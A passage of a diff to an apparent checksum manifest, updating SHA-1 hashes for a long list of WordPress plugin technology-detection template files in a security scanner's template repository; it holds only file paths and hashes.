-http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:ad9c7dc0a85622e0d17426fab559a2bec8d7b4df +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:f061268c8c2ddfa33d288a9b6f06baa68bc95fd6 +http/technologies/wordpress/plugins/elementor.yaml:dd416f45b226aa3df3619b547d64ee7223d0cfdb +http/technologies/wordpress/plugins/elementskit-lite.yaml:06ea232b62d2d5ca9b8188f4c2cb1b7296d29738 +http/technologies/wordpress/plugins/enable-media-replace.yaml:d41015f83b07d3c7e7e19ae489cc7e9da8764340 +http/technologies/wordpress/plugins/envato-elements.yaml:c1d70913abab38b9527bae7ec032dd6c4567819e +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1fd59c8444b0667f371c2c486b6e30d808f2d7be +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:10b4eda4d34911378f2a8ac50d800b2c8b5fdda3 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e3ee5e3911fcc537e07cdba18028d1ad51fdfcd8 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:ea712f34dab61e9d58a783f5d989947586c91691 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:6b21a1ae142f7aaa507695d3861f3cf2d7ed09ba +http/technologies/wordpress/plugins/flamingo.yaml:c1c48858508e2fcf27b3f10028cec54054d8eece +http/technologies/wordpress/plugins/fluentform.yaml:05de017730f2ffafa1470b0fd2fdcb57f7284a56 +http/technologies/wordpress/plugins/font-awesome.yaml:a81fff1cf9013e5b5b1abd2d7fb4a02be53e6674 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6800f411b8e15a0b7c0f78e76130089871596d7b +http/technologies/wordpress/plugins/formidable.yaml:e044dd1193108abca7b178e45cc62168e4ae4001 +http/technologies/wordpress/plugins/forminator.yaml:e85ed4a7140f5c85b7d34258f46e2133da77a6f6 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:1f46795a627e1257129f6ce26f33a9d1837956fd +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:416b2e2fec76d7041ab31b5c82dfbe7aaa59ba06 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:91fe7f11832694290aa760f9f1d66a93b65c9f55 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:879733d5c41d1a28e2114bc7f870ef3b5615a048 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:499be2a3b007a57c469b46a7a816222db088c7ef +http/technologies/wordpress/plugins/google-site-kit.yaml:135bf5b7bb6964379cb7bedfcd34bef020ba6fe3 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:0fc7b113f73f24b95883642572f097c34c744636 +http/technologies/wordpress/plugins/gtranslate.yaml:8dc46ccab8f342436ea8fce5cdaa11596d96abf1 +http/technologies/wordpress/plugins/gutenberg.yaml:2fe5575301a5472f0c393221f94fa6f382efc945 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:50a720c2fa26a5eb40fd133e71bcf413c464bd56 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:aa6a3b5d5b69422fa93c8df3724a459f0db6fcf2 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:cac2096b2847fb4d1748b74068f63cd152ab59ef +http/technologies/wordpress/plugins/header-footer.yaml:9b32350998c41f8bda175e4e516dd16f62ceeb65 +http/technologies/wordpress/plugins/health-check.yaml:a39edb121f5a60959afdf55ab4818dde81074882 +http/technologies/wordpress/plugins/hello-dolly.yaml:642950239daf4068af776c3f04923887c0578c26 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:05cc075296d23547ec3e0a02e39e9885c76c125e +http/technologies/wordpress/plugins/hostinger.yaml:fb39e4f64d78c9946a2896fce8aaaef30431b813 +http/technologies/wordpress/plugins/image-optimization.yaml:0d5a3fc198f7b46301e3bb0e6500cead0ffa2668 +http/technologies/wordpress/plugins/imagify.yaml:f4cb88061780d314d0390d3c0dda478340f82067 +http/technologies/wordpress/plugins/imsanity.yaml:62d999d5191b4b5913a329621629fa18d9be632d +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:881dbc74cd4ab6c56b9136fb2605b7edf2696d94 +http/technologies/wordpress/plugins/instagram-feed.yaml:e321aa71e3f468ceb3d25d95ebfc6b1a7ad5b7f2 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:cabb0961e55881cfbd671062d8915e4fe35bb79f http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:973301e82f4b66e2a3d9c9373e38031750df8b5c +http/technologies/wordpress/plugins/jetpack.yaml:c7c44d93c0ef214db5281a1db820cf5f253fb001 +http/technologies/wordpress/plugins/kadence-blocks.yaml:f7449e0776b8f4dfe70fc07401d825bc2d769493 +http/technologies/wordpress/plugins/kirki.yaml:1a5d5c67073c3a65dfdfae88863cf1b625d0cef0 +http/technologies/wordpress/plugins/leadin.yaml:a57be5b766f15c4118487bbf85aaa5f9d990a5da +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:cdb73b22c9b63e19089daa2095ebfc8a71d163c9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:5aa673ccf7c71cf5fe443143a9876521b2552a4f +http/technologies/wordpress/plugins/litespeed-cache.yaml:5a8128e641e8344b9090c04afe1b4a2cb8420688 +http/technologies/wordpress/plugins/loco-translate.yaml:06ed35a7db9a2ba413ca1dc63e3c3430ddf1a13b +http/technologies/wordpress/plugins/loginizer.yaml:efb3950280f09ed738f13d5f52667e5d31ec2c64 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:2276f5b154a735ed543811455256c820cdfdfbb6 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:5920f1c9739edf2b8b46135805dc2a52dcb12ff3 +http/technologies/wordpress/plugins/mailpoet.yaml:0dcc363e2a262ddb6e4c394d12532d63d5c311b9 +http/technologies/wordpress/plugins/maintenance.yaml:49abee4d4f036c0279d16c00fb32a957a6292f70 +http/technologies/wordpress/plugins/mainwp-child.yaml:52950c04c1fae432a28871ebef71082390424de4 +http/technologies/wordpress/plugins/malcare-security.yaml:b08abc793f4a9245801a8e6cd82113b2aaba5f06 +http/technologies/wordpress/plugins/megamenu.yaml:d57d31f48187f38689f2b6c0d8e520da0992fc55 +http/technologies/wordpress/plugins/members.yaml:9b49abe3e057ff23970b125b0984f3a7b3879b40 +http/technologies/wordpress/plugins/meta-box.yaml:017bf6896490fe53c633a85db0ed4e071d364b0b +http/technologies/wordpress/plugins/metform.yaml:40201e4b7667b9b604246613c6cb381b3afe1475 +http/technologies/wordpress/plugins/ml-slider.yaml:1470342bc833b6a3f1811c74c42996ea89a305cc +http/technologies/wordpress/plugins/newsletter.yaml:d7fe1b9ff0d791ee525c6415188c6399c2ca5971 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8fb9406d85278497c39fba015c21b4c87f83f9ce +http/technologies/wordpress/plugins/nextgen-gallery.yaml:1f314519cdec97b332bc1a7fcc3e8835059ec539 +http/technologies/wordpress/plugins/ninja-forms.yaml:c8bf3825a72dcd1e6853a2f29802bdf184dbd32d +http/technologies/wordpress/plugins/ocean-extra.yaml:aa1ed8e4449d437e8b7d177c0bf3d0162034beb9 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:069f9ad5116f995ff97a19aeca9eea0a69b4a625 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:257efd7e25f56e64673fb929055dfaf0b304e900 +http/technologies/wordpress/plugins/optinmonster.yaml:ebaf92eddfb68d8d5213c93f6ea92237a8c11fa8 +http/technologies/wordpress/plugins/otter-blocks.yaml:eb71a797e632c36b98cfebaf2cefad7d3aea8a33 +http/technologies/wordpress/plugins/password-protected.yaml:9d5751f0408fe46ae51b6552769ba250473d2220 +http/technologies/wordpress/plugins/pdf-embedder.yaml:12f16694ce62694ff01c133c5bcd9b3e3f5a114f http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:0fdd2c8c5ad969f8adc5ca30e907b50584fb0255 +http/technologies/wordpress/plugins/pixelyoursite.yaml:9cbaff326ba57d4a763fd69988fb986bc415ab44 +http/technologies/wordpress/plugins/polylang.yaml:c6a9e363febc74794654f805bc88849810ae5126 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:8ca17c97d735ad2268e33e16d0eb4e100a8a36e5 +http/technologies/wordpress/plugins/post-smtp.yaml:fddc9265dbac8f29297af8e42c4b29257057ef0d +http/technologies/wordpress/plugins/post-types-order.yaml:30618215e9436e474b303ce6123072fc0a25415f +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:3ef0c5dd20061f1cfb725c0175608e2ad97269b9 +http/technologies/wordpress/plugins/pretty-link.yaml:7a7b3009b1bcaef0720f456e929205a26a9eca12 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:5f3ccc944ece32f3a74c663511ef6e2ad5b5cc06 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:28a510d91063cbf448f4a7f3ff05c48e7d29f274 +http/technologies/wordpress/plugins/redirection.yaml:bbee99349e652033442b252df4b900e3b7de0c7b +http/technologies/wordpress/plugins/redux-framework.yaml:4a79aa8eae76efc34caf3fad1bad3e52279976fe +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:321d87ae2bf25df84e3d075bc9865ce8b3dc0d7b +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:806af87fd259f70b64aa968746dc87d4d576683e +http/technologies/wordpress/plugins/safe-svg.yaml:ab3a8fd74ac1b1074531993b5f5904db4ede2bfd +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d2b420be6a097d617009fb6bc2b9c8ca0fef557b +http/technologies/wordpress/plugins/sg-cachepress.yaml:b1f8c40933584facab7bfdb74878fcc2e4accafc +http/technologies/wordpress/plugins/sg-security.yaml:db3eb642dd0e02addba6fdff82b799c3d03314f4 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0a2be68100f2d14eab2499c58052ffd0338036b8 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:cf51d663fc97c00064c9d4d7168f82b80c7435a0 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:b01e8335d22518a304230a593f02335a18390170 +http/technologies/wordpress/plugins/simple-history.yaml:c1067f5e5c379ef56fb7dd734a3c6e61ad40ab59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:e6c358b461142ab273f0ff4ffd8003e1de848f39 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:18ed50f702cb83d9d459dba235ea971c9c95cdcc +http/technologies/wordpress/plugins/smart-slider-3.yaml:dfe98f15e3170bde327f6c0b4d09d80d8788dbeb +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:b93bafc4b34de6321fe93bff85acc141c982819c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:beb358be45eebcf972e6542fc75270a7f8f4faa3 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:382da7b0f6a776c681fb8145d741a5452be0d792 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:1f822d55c263f588ac3c85baf23b50b27f657f10 +http/technologies/wordpress/plugins/svg-support.yaml:aa8f9f1cb7811901504546d5f6caaf01e61eec88 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e400c1d71b020b7e96fea574923d8e6d07533a97 +http/technologies/wordpress/plugins/tablepress.yaml:ba828a2178b8cdc2ab77a37c02314e73bc4958a4 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:7dd0b07fa6a1453f94ca15f98fa5ec93e62dde66 +http/technologies/wordpress/plugins/templately.yaml:1bedd3aefeaa1e1c4f396be20901cd901958dace +http/technologies/wordpress/plugins/the-events-calendar.yaml:6ac5ddb0a7deb1e3b8e8de2eadd35454d87cd772 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:14c1ef3e1593c7a677486bb810603e676c46d33f +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:436df5e046c2ddcdf342c7eb550d02a06ac081cc +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:609d1ca0f93e375fb88b674e317dc57b5569f39f +http/technologies/wordpress/plugins/under-construction-page.yaml:6703c7c6e52a802600f52296d44136383d4e0052 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:96fc0a0f004ecf329d24e1579cbe3b8dd38ed3ff http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:6d2ab7874805973ff7869f2f9eead7b0787bb0d5 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:f9ec60f147849303c42cd383b84ffc16aa75936f +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:b5ea5547b5af657cdc068ce6bc2e36b6a229b11a +http/technologies/wordpress/plugins/webp-express.yaml:cf5ad7fda4091a4d782a0cef89380fde88875f82 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:e605cc8b705a846116ae092ffdc1320f11a50c4b +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:40645ae5f4ad0ccf782240628116652ca4374b45 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:2861f56bcb6f178cffa56d61eb4ca64b61ff1302 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:8779a13616a1ec4a46a15c8b86a7102071d465a4 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:ff7313cff92fb3994e46bff34f31e12c4cf07561 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:7d28402e26f2398873558096a922eb777ca1e76d +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3185825e0f5b30dfbb9bf0f6190f880ed6b702ec +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:3a93960632c440143b30c46280f69dc8c2da1efe +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:7f5dbd6188afdb9479ac5fbb17d760da0657fb18 +http/technologies/wordpress/plugins/woocommerce-services.yaml:ff55ec8d4fc0670c8d88feb3e4cb19ec6d20faca +http/technologies/wordpress/plugins/woocommerce.yaml:cb46f349a805856ba4cb2fd0d2f0db88c439e97b +http/technologies/wordpress/plugins/wordfence.yaml:d98dba70ddd69d8c312bfe65419986a5d35bc221 +http/technologies/wordpress/plugins/wordpress-importer.yaml:4fb2dd763fe733091712ee2792b7b841208d2277 +http/technologies/wordpress/plugins/wordpress-seo.yaml:71ee2c058c37d7e402559bf8cf300574ddf86fa3 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:d02db272086cf3ccfcce4e2a1ea3a2837ca55ccf +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:27dd704b97611487edefa3a2adb2e25f144785df +http/technologies/wordpress/plugins/wp-file-manager.yaml:ed45c111d8ec0dd9e87ebd2378a6ef7287f7830a 